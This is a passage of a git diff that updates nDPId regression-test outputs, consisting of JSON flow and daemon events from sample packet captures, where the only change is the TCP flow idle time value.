-00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1470104410885,"flow_last_seen":1470104428908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6132,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"119.235.235.84","dst_ip":"192.168.5.16","src_port":443,"dst_port":53406,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1470104410885,"flow_last_seen":1470104428908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6132,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"119.235.235.84","dst_ip":"192.168.5.16","src_port":443,"dst_port":53406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104381895,"flow_last_seen":1470104382125,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":633,"flow_tot_l4_payload_len":1497,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":419,"flow_first_seen":1470104382053,"flow_last_seen":1470104433789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":161031,"flow_avg_l4_payload_len":384,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Media"}} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1470104410885,"flow_last_seen":1470104428908,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6132,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"119.235.235.84","dst_ip":"192.168.5.16","src_port":443,"dst_port":53406,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1470104410885,"flow_last_seen":1470104428908,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6132,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"119.235.235.84","dst_ip":"192.168.5.16","src_port":443,"dst_port":53406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104381895,"flow_last_seen":1470104382125,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":633,"flow_tot_l4_payload_len":1497,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":419,"flow_first_seen":1470104382053,"flow_last_seen":1470104433789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":161031,"flow_avg_l4_payload_len":384,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Media"}} 00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104378901,"flow_last_seen":1470104378905,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"168.95.1.1","src_port":52723,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Streaming"}} 
00605{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402518,"flow_last_seen":1470104402518,"flow_idle_time":180000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:feea:365","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402518,"flow_last_seen":1470104402518,"flow_idle_time":180000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:feea:365","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -675,8 +675,8 @@ 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104390741,"flow_last_seen":1470104390741,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:fe9a:ec54","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104426973,"flow_last_seen":1470104426973,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"17.253.26.125","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104377901,"flow_last_seen":1470104378954,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":52723,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"}} 
-00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104388033,"flow_last_seen":1470104433040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.87","src_port":49596,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104388033,"flow_last_seen":1470104433040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.87","src_port":49596,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104388033,"flow_last_seen":1470104433040,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.87","src_port":49596,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104388033,"flow_last_seen":1470104433040,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.87","src_port":49596,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104382448,"flow_last_seen":1470104382858,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":61548,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1470104404055,"flow_last_seen":1470104418595,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::beee:7bff:fe0c:b3de","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} 
00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104377634,"flow_last_seen":1470104378045,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":61603,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} diff --git a/test/results/443-chrome.pcap.out b/test/results/443-chrome.pcap.out index d9095a931..0707d9454 100644 --- a/test/results/443-chrome.pcap.out +++ b/test/results/443-chrome.pcap.out 
@@ -1,9 +1,9 @@ 00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"443-chrome.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1581109434258} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109434258,"flow_last_seen":1581109434258,"flow_idle_time":7440000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1581109434258,"l3_proto":"ip4","src_ip":"178.62.197.130","dst_ip":"192.168.1.13","src_port":443,"dst_port":53059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581109434258,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1581109434258,"pkt":"KDc3AG3IEBMx8Tl2CABFAAXUL9xAADQG19GyPsWCwKgBDQG7z0OMwKr+Oj0RjoAQAfVXrQAAAQEICiUvy0seKwePAbBkhQkGDSwXAwMFJB7ULkZYT314CXk9r8PlYJygP344H6B+ItT1QydBOUTT\/6D31GPVzKtOQjSVxhbT8njy8fnLCF03csGz4\/Y1RkgUVmI84ERVBP7zbdzqFVMxHmkRU4146\/GYpGt09JudxRaBFBE6RH99GaIPOIBgIxL+lVzyEaqTle8b2ooKlmYXANwIghY6MzW7vfR0m2NAd4\/mImO8\/LyUCeGK0r\/puyNRW7lwQQMAmHKJdbXl9VyEWyHoVGg2V7UztPOOS9FaOf7PI0qXcHmQjpNhC3tUdKXBoA5lr9L4gV9TtzI0jsGqvB9N6GFz+qcMvQNu9oMflyIYBhNXeC+wMS3iHkbmb6YjZ1BITgZEep9Fizk45i3xCMymSmOsda0ujEX4jtgvxVvAdOobavQSODmvW7nF0r5t9e88tMuzTz7+vTqoOaJn4Q5qSGioRtcVHnLq2LNPOuGgbZaLvf8nOa3F\/fTzsfVgOnrof2PK7x6zJRR4iLtFUyiyV0abVTIHELfIYnSCf71pFYSlMWF1kbosbMAxw+8gDHb28maLs7wPXvpNMwUQmC5zWPLwG8e+Pf\/3nur0wrn5EOul2L1tr2PBCGM7nQJnzz+Ftab4qAnCKKMUrufRAVhXA6Ue6CMSRLYliOxzGRgmHVxorbbpx87m7XMCx1xGrv\/+sMpgjOYFPN80vjeb9Ar4xkocVQgWuuKpaWdNDznMzFzG0+H1ekKy8mE\/Y4uj8aty0rTxx\/RK0gYF2CUtsmGNskEzCWUbq5MAqcp05SHkAJHGGJeLVJYaWPvGXbFa5QHn9poomy6DBa+Zu\/J+olJwYCoT+frN77wk+XmgZEGX8LeovmjP4s1R+UbEFUsUMksh6m15XB\/oDSc43HBC0ZN2fBl+EVSpfPjbG\/eOyIfLCt5fbBfnhNgvommX5LE+2Hk1er+ly1V3Bk3SksoPHjYC3atFWwOW8i0ksy3cnSr3r7urFNldk3MU3+jnEXfTimw+aCW1vRMowhmfm8PlgjcufRfy+KbXvWvcglQ5SIZzkHbMTgRIVTH0rnzAvQa5V3qwPK10Uoz7qDIouhn\/mb\/ZISHF6mBR\/IXvmgdDxCQjDF0pzdpHGlijQnscX9IYmuALydf\/N95pDI1Ksot3SwlV+ToeoAcOu03ffeX9ZWtpGReoSSLBreVK2S9eOKb7ts0O5zIIo7KsqQiv\/vBgScz8WXOWpxQ\/yJVR5ay52w6EYcainLIU7Xbc\/tjzrhulig3U\/8LJroIUx7FTN+1M\/XXQgxU1xPwXfZVd2BCyLjPf3LnCxXwnRvsKpAN+jMhuodhLSF7CgHqc20YiiLhRoKoX9HTNFjjp4NCVuyybqoR14grCEsHZOU2qhA+8BZe5VlL7unSunUXcr1PeN9gM5Jq4MVqPdpyzDhvJpSxU3Hx+L1u56H6J0VrRo\/R6fO225uB9ZADFU\/E9+rLvS3XjVihQI4Xj3oV8Yz2DHOUB7myCSIfri88
nrYevcoAQbwAgIH3ZuvMVV+F7spgWZOgjijLQs9AFYfhIg77XK7GhiJW4kT1GNIqN\/59u+gIdPmDuGurVucPbruilLRCDIsr+53Us+irmCwo\/E2YPbk4a0f3NX0k+rNo92g1D9wTfG3QFRXLoBVDcr2q9BeW0PVJsavNUQM+jFbQkjfp93AvyPnmEBcWXIT002jYiClr1Y1\/emkCZ90t5YN1lLX5fUvWWgwvQ8NqFZ2zWMZciPkbKDA3g3Y+AskVzW3FFBLqR77\/aXs+9FwMDBSQUQnjU3ptBoEOyx5s5g6C1C+gxkfWLgzLDV66R77tBk395nAfOwKbaxf02lWN9Kl7ER9qk1HP5doNJPo83hbomHGy3aIU4qtqfnGI\/DWje6wuZoh6zDMTlo3NI6IL\/slMBsWm6kBIHkYOp"} -00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109434258,"flow_last_seen":1581109434258,"flow_idle_time":7440000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1581109434258,"l3_proto":"ip4","src_ip":"178.62.197.130","dst_ip":"192.168.1.13","src_port":443,"dst_port":53059,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109434258,"flow_last_seen":1581109434258,"flow_idle_time":7440000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1581109434258,"l3_proto":"ip4","src_ip":"178.62.197.130","dst_ip":"192.168.1.13","src_port":443,"dst_port":53059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109434258,"flow_last_seen":1581109434258,"flow_idle_time":7560000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1581109434258,"l3_proto":"ip4","src_ip":"178.62.197.130","dst_ip":"192.168.1.13","src_port":443,"dst_port":53059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581109434258,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1581109434258,"pkt":"KDc3AG3IEBMx8Tl2CABFAAXUL9xAADQG19GyPsWCwKgBDQG7z0OMwKr+Oj0RjoAQAfVXrQAAAQEICiUvy0seKwePAbBkhQkGDSwXAwMFJB7ULkZYT314CXk9r8PlYJygP344H6B+ItT1QydBOUTT\/6D31GPVzKtOQjSVxhbT8njy8fnLCF03csGz4\/Y1RkgUVmI84ERVBP7zbdzqFVMxHmkRU4146\/GYpGt09JudxRaBFBE6RH99GaIPOIBgIxL+lVzyEaqTle8b2ooKlmYXANwIghY6MzW7vfR0m2NAd4\/mImO8\/LyUCeGK0r\/puyNRW7lwQQMAmHKJdbXl9VyEWyHoVGg2V7UztPOOS9FaOf7PI0qXcHmQjpNhC3tUdKXBoA5lr9L4gV9TtzI0jsGqvB9N6GFz+qcMvQNu9oMflyIYBhNXeC+wMS3iHkbmb6YjZ1BITgZEep9Fizk45i3xCMymSmOsda0ujEX4jtgvxVvAdOobavQSODmvW7nF0r5t9e88tMuzTz7+vTqoOaJn4Q5qSGioRtcVHnLq2LNPOuGgbZaLvf8nOa3F\/fTzsfVgOnrof2PK7x6zJRR4iLtFUyiyV0abVTIHELfIYnSCf71pFYSlMWF1kbosbMAxw+8gDHb28maLs7wPXvpNMwUQmC5zWPLwG8e+Pf\/3nur0wrn5EOul2L1tr2PBCGM7nQJnzz+Ftab4qAnCKKMUrufRAVhXA6Ue6CMSRLYliOxzGRgmHVxorbbpx87m7XMCx1xGrv\/+sMpgjOYFPN80vjeb9Ar4xkocVQgWuuKpaWdNDznMzFzG0+H1ekKy8mE\/Y4uj8aty0rTxx\/RK0gYF2CUtsmGNskEzCWUbq5MAqcp05SHkAJHGGJeLVJYaWPvGXbFa5QHn9poomy6DBa+Zu\/J+olJwYCoT+frN77wk+XmgZEGX8LeovmjP4s1R+UbEFUsUMksh6m15XB\/oDSc43HBC0ZN2fBl+EVSpfPjbG\/eOy
IfLCt5fbBfnhNgvommX5LE+2Hk1er+ly1V3Bk3SksoPHjYC3atFWwOW8i0ksy3cnSr3r7urFNldk3MU3+jnEXfTimw+aCW1vRMowhmfm8PlgjcufRfy+KbXvWvcglQ5SIZzkHbMTgRIVTH0rnzAvQa5V3qwPK10Uoz7qDIouhn\/mb\/ZISHF6mBR\/IXvmgdDxCQjDF0pzdpHGlijQnscX9IYmuALydf\/N95pDI1Ksot3SwlV+ToeoAcOu03ffeX9ZWtpGReoSSLBreVK2S9eOKb7ts0O5zIIo7KsqQiv\/vBgScz8WXOWpxQ\/yJVR5ay52w6EYcainLIU7Xbc\/tjzrhulig3U\/8LJroIUx7FTN+1M\/XXQgxU1xPwXfZVd2BCyLjPf3LnCxXwnRvsKpAN+jMhuodhLSF7CgHqc20YiiLhRoKoX9HTNFjjp4NCVuyybqoR14grCEsHZOU2qhA+8BZe5VlL7unSunUXcr1PeN9gM5Jq4MVqPdpyzDhvJpSxU3Hx+L1u56H6J0VrRo\/R6fO225uB9ZADFU\/E9+rLvS3XjVihQI4Xj3oV8Yz2DHOUB7myCSIfri88nrYevcoAQbwAgIH3ZuvMVV+F7spgWZOgjijLQs9AFYfhIg77XK7GhiJW4kT1GNIqN\/59u+gIdPmDuGurVucPbruilLRCDIsr+53Us+irmCwo\/E2YPbk4a0f3NX0k+rNo92g1D9wTfG3QFRXLoBVDcr2q9BeW0PVJsavNUQM+jFbQkjfp93AvyPnmEBcWXIT002jYiClr1Y1\/emkCZ90t5YN1lLX5fUvWWgwvQ8NqFZ2zWMZciPkbKDA3g3Y+AskVzW3FFBLqR77\/aXs+9FwMDBSQUQnjU3ptBoEOyx5s5g6C1C+gxkfWLgzLDV66R77tBk395nAfOwKbaxf02lWN9Kl7ER9qk1HP5doNJPo83hbomHGy3aIU4qtqfnGI\/DWje6wuZoh6zDMTlo3NI6IL\/slMBsWm6kBIHkYOp"} +00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109434258,"flow_last_seen":1581109434258,"flow_idle_time":7560000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1581109434258,"l3_proto":"ip4","src_ip":"178.62.197.130","dst_ip":"192.168.1.13","src_port":443,"dst_port":53059,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109434258,"flow_last_seen":1581109434258,"flow_idle_time":7560000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1581109434258,"l3_proto":"ip4","src_ip":"178.62.197.130","dst_ip":"192.168.1.13","src_port":443,"dst_port":53059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-data-len":1440,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1581109434258} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 diff --git a/test/results/443-curl.pcap.out b/test/results/443-curl.pcap.out index e3a2e816e..0b97c350b 100644 --- a/test/results/443-curl.pcap.out +++ b/test/results/443-curl.pcap.out 
